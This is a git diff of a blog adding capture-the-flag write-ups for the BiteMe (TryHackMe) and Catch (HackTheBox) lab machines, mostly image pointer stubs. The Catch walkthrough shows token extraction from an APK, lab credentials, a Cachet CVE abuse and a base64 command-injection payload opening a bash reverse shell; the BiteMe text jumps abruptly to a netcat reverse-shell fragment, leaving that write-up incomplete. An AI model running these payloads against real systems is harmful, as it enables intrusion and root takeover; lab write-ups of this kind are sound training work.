b/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp new file mode 100644 index 0000000..e324ad3 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a7463093f9159c6feb32fbbc69cb5dd639d5705de0f4bfff3da6475b21d3f75 +size 20918 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-11.png b/content/writeup-ctf/writeup-biteme-thm/img/image-11.png new file mode 100644 index 0000000..1b02aa6 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:539530f18c28b6476806958a5a3c0ff749d75943aa552d09b022977d4a80ac6d +size 18565 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp new file mode 100644 index 0000000..f4f8667 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:319a6d68946a7095a605fb1b396d11f62beef5383450ec5446c3e0c004f7c455 +size 19178 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-2.png b/content/writeup-ctf/writeup-biteme-thm/img/image-2.png new file mode 100644 index 0000000..6cca661 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:499c2f62dcc4bd5e81a54dc83bfc0c7a9746e979b13f429c562dd2fa95597843 +size 57323 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp new file mode 100644 index 0000000..b59b296 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db55ee05553c2b0acb189b441740044f85cc2e91d54024bed41eb299be1ff75f +size 52796 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-3.png b/content/writeup-ctf/writeup-biteme-thm/img/image-3.png new file mode 100644 index 0000000..d12d014 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:932755c76882e0b1bc8018a285eb5b556f5cb32962e0ff01584bc2f6bdc80656 +size 86905 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp new file mode 100644 index 0000000..55f1949 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e44dbf53b640f388b57bd121b2dca9a53f272ed3e46e72a3d34ca8223bfdaa61 +size 79924 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-4.png b/content/writeup-ctf/writeup-biteme-thm/img/image-4.png new file mode 100644 index 0000000..8ac800d --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:96f2bc47cbd1a694e5d04a6d3e404fb218b3e04653eaf33db41d4d312fb32194 +size 18126 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp new file mode 100644 index 0000000..bcd9de8 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:272608ed24040959430b54b0a35d7f92dcb2218bf1d4d3cdb5bddf25b2f48aa5 +size 11342 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-5.png b/content/writeup-ctf/writeup-biteme-thm/img/image-5.png new file mode 100644 index 0000000..12da642 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:526bd90316ce72f1f46b178f07043b4dfd1d90fc09b1210e4d853a56fdddf895 +size 5544 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp new file mode 100644 index 0000000..71f7b9d --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f51b45d70d966496681460dcc5602cb92e8e40587f97b23c37214670fb3ea26 +size 4120 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-6.png b/content/writeup-ctf/writeup-biteme-thm/img/image-6.png new file mode 100644 index 0000000..8db9f4e --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7abdcafef6d1624b614efbdf87289be606003843fce2762a777bbaaaf0bede12 +size 6770 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp new file mode 100644 index 0000000..52c118b --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57e91669dfd6dc38e2d9182b2a8c1b2a7b34283e2f36c56d5d3909f35bdee7cb +size 11588 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-7.png b/content/writeup-ctf/writeup-biteme-thm/img/image-7.png new file mode 100644 index 0000000..0d44a2e --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82501103aecf2c78124a796e52618fcbe8ad8c6d384ac79f2f918086fa4b0e8e +size 149970 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp new file mode 100644 index 0000000..3811fec --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3bb0f26f55c6528eeb0820d417d1f6a04835cc325fd778a2841a5fcab16f56e8 +size 146672 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-8.png b/content/writeup-ctf/writeup-biteme-thm/img/image-8.png new file mode 100644 index 0000000..7bd2020 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e977062c7558272d997318abcfb64fc39f1111b7769dff2171431bc0003ed0e2 +size 42326 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp new file mode 100644 index 0000000..a3217b9 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:926b5456fb4ed233bbb5bd4bae8d2f3b1fe763a4603604b02fe9ca66d6e107ca +size 37152 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-9.png b/content/writeup-ctf/writeup-biteme-thm/img/image-9.png new file mode 100644 index 0000000..30ecba1 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:381126ccacb78010cd9907666475fc82797f0c12510b6728249cc5e80a906a26 +size 16143 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp new file mode 100644 index 0000000..f0b7b78 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3496bcb1d4d6e45e7f461aff86cd3657bb5de894d3d9da45b33a5832b9d5e90e +size 18106 diff --git a/content/writeup-ctf/writeup-biteme-thm/index.md b/content/writeup-ctf/writeup-biteme-thm/index.md new file mode 100644 index 0000000..6d4710e --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/index.md @@ -0,0 +1,149 @@ +--- +title: "Writeup - BiteMe (THM)" +date: 2022-03-21 +slug: "writeup-biteme-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Biteme](https://tryhackme.com/room/biteme) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.31.162 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.29) + +## Exploit + +First of all I start with a scan of the website pages. + +![](img/image-2.webp) + +Nothing special, let's try to do the same scan but with a focus on ".php" pages. + +![](img/image-3.webp) + +Ok, now there are a number of pages, including the "dashboard.php" page which gives us access to a login form. + +![](img/image-4.webp) + +The page "config.php" which gives us information about a connection identifier. + + +```bash + &1|nc 10.18.67.218 1234 >/tmp/f +``` +I then run the following command to restart fail2ban: + + +```bash +sudo systemctl restart fail2ban +``` +I now have a root shell and I can get the last flag! + +![](img/image-11.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not allow access to .phps pages +- Use a real password verification function +- Implement an anti-brute force function for the MFA page +- Don't let sudo be used without a password diff --git a/content/writeup-ctf/writeup-catch-htb/featured.png b/content/writeup-ctf/writeup-catch-htb/featured.png new file mode 100644 index 0000000..352f305 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:668b4799997b7b15925b22c6f90caef4dd9a3751f1affc2818a248af11124dce +size 280600 diff --git a/content/writeup-ctf/writeup-catch-htb/featured.webp b/content/writeup-ctf/writeup-catch-htb/featured.webp new file mode 100644 index 0000000..7b4ba2f --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b528a1a5a6d048d10c75127fa07ace3a6f68cff51200dd7ea899519e32b0c1d3 +size 29616 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-1.png b/content/writeup-ctf/writeup-catch-htb/img/image-1.png new file mode 100644 index 0000000..2b98e63 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6aa240d6b3c7725b181cf04cdc3a63904031a33dab717c3f0dadd83cdc9d1e6 +size 37756 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-1.webp b/content/writeup-ctf/writeup-catch-htb/img/image-1.webp new file mode 100644 index 0000000..1143951 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:265befeb32aaef59b25030707307b41895a96465703bc59c340a2a51fd3292cb +size 25552 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-2.png b/content/writeup-ctf/writeup-catch-htb/img/image-2.png new file mode 100644 index 0000000..3c84cf1 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f24387998a7dae717a0007afff006b4c1096577533bf6238ed8d4dd7c0ce430 +size 184173 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-2.webp b/content/writeup-ctf/writeup-catch-htb/img/image-2.webp new file mode 100644 index 0000000..53c8600 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:37ef389fbbc27ee1d3f89ba9f0d74b32c0c5d6e4b345ab016999cc86133c6f86 +size 51572 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-3.png b/content/writeup-ctf/writeup-catch-htb/img/image-3.png new file mode 100644 index 0000000..a212e6f --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa141d6db2a20161288bc144939be9db4677f34c00092da99dc8a2982589afab +size 70981 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-3.webp b/content/writeup-ctf/writeup-catch-htb/img/image-3.webp new file mode 100644 index 0000000..332ee2e --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64214aeff159d78e04417ddedc81cb4f806a210625dc96185ab90e95d68854b3 +size 46066 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-4.png b/content/writeup-ctf/writeup-catch-htb/img/image-4.png new file mode 100644 index 0000000..0239894 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9474c2361eeac9f48e504e21d4e01878155ce6b7bb26cc53f2224f90fa21710a +size 46023 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-4.webp b/content/writeup-ctf/writeup-catch-htb/img/image-4.webp new file mode 100644 index 0000000..e25229a --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a548359ed65b9527d24bb8c428e62cbc8154f91b6f8cb8651d1fba84dd7b704 +size 19124 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-5.png b/content/writeup-ctf/writeup-catch-htb/img/image-5.png new file mode 100644 index 0000000..17428f2 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:042fbb1fb99e98c40a24e6a9772d255e982a5a37e7bbffa3d2fd325f68fa1348 +size 18024 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-5.webp b/content/writeup-ctf/writeup-catch-htb/img/image-5.webp new file mode 100644 index 0000000..1de6fe1 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:712dc68b4094517c892df5e8b10756469b2d3021f213964be581ae7117e2afc8 +size 9138 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-6.png b/content/writeup-ctf/writeup-catch-htb/img/image-6.png new file mode 100644 index 0000000..434751a --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ba90e475b421c8f3f7a1d6ddb27de9dd91279e43a04fd3669211f05c525881d +size 80294 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-6.webp b/content/writeup-ctf/writeup-catch-htb/img/image-6.webp new file mode 100644 index 0000000..78c012d --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68213d0ac71604e50d245441f1fa6f2eaa7786b165b11bb6045b7a33be1e57c7 +size 99478 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-7.png b/content/writeup-ctf/writeup-catch-htb/img/image-7.png new file mode 100644 index 0000000..533a57c --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6633b17aaaf81b93539aa83f82b84524eaaeaa300df7f9d512c74685659d96d2 +size 11626 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-7.webp b/content/writeup-ctf/writeup-catch-htb/img/image-7.webp new file mode 100644 index 0000000..5da76bf --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a9e2b4c9f04b12b767c07d30909bbf5c776a2cb7996048de529e1df89329f7a +size 11838 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-8.png b/content/writeup-ctf/writeup-catch-htb/img/image-8.png new file mode 100644 index 0000000..821708c --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8af22711ae5ba67ac14de66f4cc2e79aeeadfca3a77e4708e8b7de0b7f764b6 +size 17196 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-8.webp b/content/writeup-ctf/writeup-catch-htb/img/image-8.webp new file mode 100644 index 0000000..8acc1d8 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65ec1675b299969559bd757b82abb525e6c3f635da324e337c7e43cf05d54607 +size 22672 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-9.png b/content/writeup-ctf/writeup-catch-htb/img/image-9.png new file mode 100644 index 0000000..996c43e --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a361bcc70158e4180a45edc9de791ce2444168f4cbe206977b5eb9a92999c60 +size 17739 diff --git a/content/writeup-ctf/writeup-catch-htb/img/image-9.webp b/content/writeup-ctf/writeup-catch-htb/img/image-9.webp new file mode 100644 index 0000000..5ad7bff --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3780ee70dc721214fdd3c96714174a23aec74bbc0fc668a275769177d3c0021a +size 18002 diff --git a/content/writeup-ctf/writeup-catch-htb/index.md b/content/writeup-ctf/writeup-catch-htb/index.md new file mode 100644 index 0000000..6ef53c0 --- /dev/null +++ b/content/writeup-ctf/writeup-catch-htb/index.md @@ -0,0 +1,251 @@ +--- +title: "Writeup - Catch (HTB)" +date: 2022-04-30 +slug: "writeup-catch-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Catch](https://app.hackthebox.com/machines/Catch) machine on the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -sC -O -T4 -n -Pn -oA fastscan 10.129.180.130 +``` +Five TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 3000 : Gitea 1.14.1 +- 5000 : let's Chat +- 8000 : Cachet (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +At first I start by scanning the files of the site. + +![](img/image-3.webp) + +Nothing particular, by going on the site, there is the possibility of downloading an application: `catchv1.0.apk`. So I download it, then I unpack it with the following command: + + +```bash +apktool d catchv1.0.apk +``` +Then I look for passwords, tokens, ... + + +```bash +┌──(d3vyce㉿kali)-[~/catchv1.0] +└─$ find ./ -type f -exec grep -H 'token' {} \; +./res/values/strings.xml: b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0 +./res/values/strings.xml: NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ== +./res/values/strings.xml: xoxp-23984754863-2348975623103 +[...] +``` +We find 2 tokens, one is for gitea and the other is for lets chat. I choose to start with the second one. At first I generate a request with the help of Burp. Then after some research I find on this [site](https://stackoverflow.com/questions/37302448/lets-chat-authentication-via-ajax-request) that to add a token to the request it is necessary to use `Authorisation: bearer [TOKEN]`. Now that I have the authorization, I start by listing the different rooms: + + +```bash +GET /rooms HTTP/1.1 +Host: catch.htb:5000 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Authorisation: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ +Cookie: connect.sid=s%3APQgPB6T9iE4OkwoXsVLWBTYYv__899Ny.v%2BdKrRNFbDrEQkPjm0kAoxdQfi6%2BsTB0AmPQ1q%2BnKns +If-None-Match: W/"35c-aAImKzSV1mWHmtGLu5/YkMt+2hk" +Connection: close +``` + +```bash +HTTP/1.1 200 OK +X-Frame-Options: SAMEORIGIN +X-Download-Options: noopen +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +Content-Security-Policy: +X-UA-Compatible: IE=Edge,chrome=1 +Content-Type: application/json; charset=utf-8 +ETag: W/"35c-aAImKzSV1mWHmtGLu5/YkMt+2hk" +Vary: Accept-Encoding +Date: Fri, 22 Apr 2022 10:31:05 GMT +Connection: close +Content-Length: 860 + +[{"id":"61b86b28d984e2451036eb17","slug":"status","name":"Status","description":"Cachet Updates and Maintenance","lastActive":"2021-12-14T10:34:20.749Z","created":"2021-12-14T10:00:08.384Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}, +{"id":"61b8708efe190b466d476bfb","slug":"android_dev","name":"Android Development","description":"Android App Updates, Issues & More","lastActive":"2021-12-14T10:24:21.145Z","created":"2021-12-14T10:23:10.474Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}, +{"id":"61b86b3fd984e2451036eb18","slug":"employees","name":"Employees","description":"New Joinees, Org updates","lastActive":"2021-12-14T10:18:04.710Z","created":"2021-12-14T10:00:31.043Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}] +``` +I find in the result 3 rooms. I try now to list the messages included in the first room. For that I use the following query: + + +```bash +GET /rooms/61b86b28d984e2451036eb17/messages HTTP/1.1 +``` +I find several messages including this one: + + +```bash +[...] +"id":"61b8702dfe190b466d476bfa","text":"Here are the credentials `john : E}V!mywu_69T4C}W`", +"posted":"2021-12-14T10:21:33.859Z", +"owner":"61b86f15fe190b466d476bf5", +"room":"61b86b28d984e2451036eb17" +[...] +``` +A password and a login! I try to use it on the site hosted on port 8000 : + +![](img/image-4.webp) + +I find that the panel is version 2.4.0 of Cachet. After some research I find the CVE-2021-39174 which allows to obtain the contents of the variable `DB_username` and `DB_password`. For that I go in the notification parameters I set `Mail Driver` to SMTP. Then I fill `Mail From Address` with the following content: `${DB_username}`. I save and I refresh the page. + +I repeat the same procedure for the password. + +![](img/image-5.webp) + +Finally I find the following credentials: `will / s2#4Fg0_%3!` + +I now have SSH access with the user will and I can get the first flag. + +![](img/image-6.webp) + +## Privilege escalation + +I start by running the [linpeas.sh](https://linpeas.sh) script to get an overview of the machine. I quickly find a script belonging to root but that I can read. + +![](img/image-7.webp) + + +```bash +#!/bin/bash + +################### +# Signature Check # +################### + +sig_check() { + jarsigner -verify "$1/$2" 2>/dev/null >/dev/null + if [[ $? -eq 0 ]]; then + echo '[+] Signature Check Passed' + else + echo '[!] Signature Check Failed. Invalid Certificate.' + cleanup + exit + fi +} + +####################### +# Compatibility Check # +####################### + +comp_check() { + apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null + COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml") + if [ -z "$COMPILE_SDK_VER" ]; then + echo '[!] Failed to find target SDK version.' + cleanup + exit + else + if [ $COMPILE_SDK_VER -lt 18 ]; then + echo "[!] APK Doesn't meet the requirements" + cleanup + exit + fi + fi +} + +#################### +# Basic App Checks # +#################### + +app_check() { + APP_NAME=$(grep -oPm1 "(?<=)[^<]+" "$1/res/values/strings.xml") + echo $APP_NAME + if [[ $APP_NAME == *"Catch"* ]]; then + echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}' + mv "$3/$APK_NAME" "$2/$APP_NAME/$4" + else + echo "[!] App doesn't belong to Catch Global" + cleanup + exit + fi +} + + +########### +# Cleanup # +########### + +cleanup() { + rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh) +} + + +################### +# MDM CheckerV1.0 # +################### + +DROPBOX=/opt/mdm/apk_bin +IN_FOLDER=/root/mdm/apk_bin +OUT_FOLDER=/root/mdm/certified_apps +PROCESS_BIN=/root/mdm/process_bin + +for IN_APK_NAME in $DROPBOX/*.apk;do + OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk" + APK_NAME="$(openssl rand -hex 12).apk" + if [[ -L "$IN_APK_NAME" ]]; then + exit + else + mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME" + fi + sig_check $IN_FOLDER $APK_NAME + comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN + app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME +done +cleanup +``` +In this script one part is particularly interesting: + + +```bash +if [[ $APP_NAME == *"Catch"* ]]; then + echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}' + mv "$3/$APK_NAME" "$2/$APP_NAME/$4" +``` +The script checks that the word `Catch` is present in the `app_name` variable of the apk file. But what is interesting is that we can put what we want before or after. I go back to the application folder that I had decompiled before. Then in the file `res/values/strings.xml` I modify the value of `app_name`. + + +```bash +[...] +Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvMTIzNCAwPiYxCg== | base64 -d | bash -i +[...] +``` +After adding a reverse shell, I recompile the application with the following command: + +![](img/image-8.webp) + +{{< alert >}} +You need apktool [v2.6.1](https://github.com/iBotPeaches/Apktool/releases/tag/v2.6.1) to do this !I now run the verification script. Then I get a reverse shell as root and I can get the last flag. +{{< /alert >}} + +![](img/image-9.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave tokens with access to sensitive content in an application available to all +- Update Cache to avoid CVE-2021-39174 exploit +- Do not use the same password for the database and a machine user +- Use a stricter check for the `app_name` variable diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png new file mode 100644 index 0000000..07b664d --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4473de58c71b203dff425ff1fad94f43dbab3fa64528cc299ede1e598e02015c +size 182952 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp new file mode 100644 index 0000000..f73454e --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17de1ad735251e7c04e4e6a87b01edabf48fe9023a9e335b6600891fc61fabf5 +size 122958 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png new file mode 100644 index 0000000..e78617a --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90604d9657fd977333b5a3d020330a488080328a35e334dac5697956c9f4c719 +size 29831 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp new file mode 100644 index 0000000..408b07f --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ace903c84e4efada9d8b008e053d95e73dd750b219c88064e0e4756fdc4b6d8 +size 25490 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png new file mode 100644 index 0000000..d86f82b --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c75f8ec447aebff85e5720f2e61d167b9f5e9f7e8d04f34cd05c71927befe8e0 +size 44343 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp new file mode 100644 index 0000000..98a337f --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b46da451f1ec3b5297501bbc15cde162c4b8839796fd9f71afe068e68106b3bb +size 49582 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png new file mode 100644 index 0000000..3c6d94b --- /dev/null +++ b/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e24a20580affa6f89c93e15980bbc8ca66f10b227ab398eb36af703262812309 +size 34693 diff --git a/content/writeup-ctf/writeup-dc-9-vulnhub/img/image-11.webp 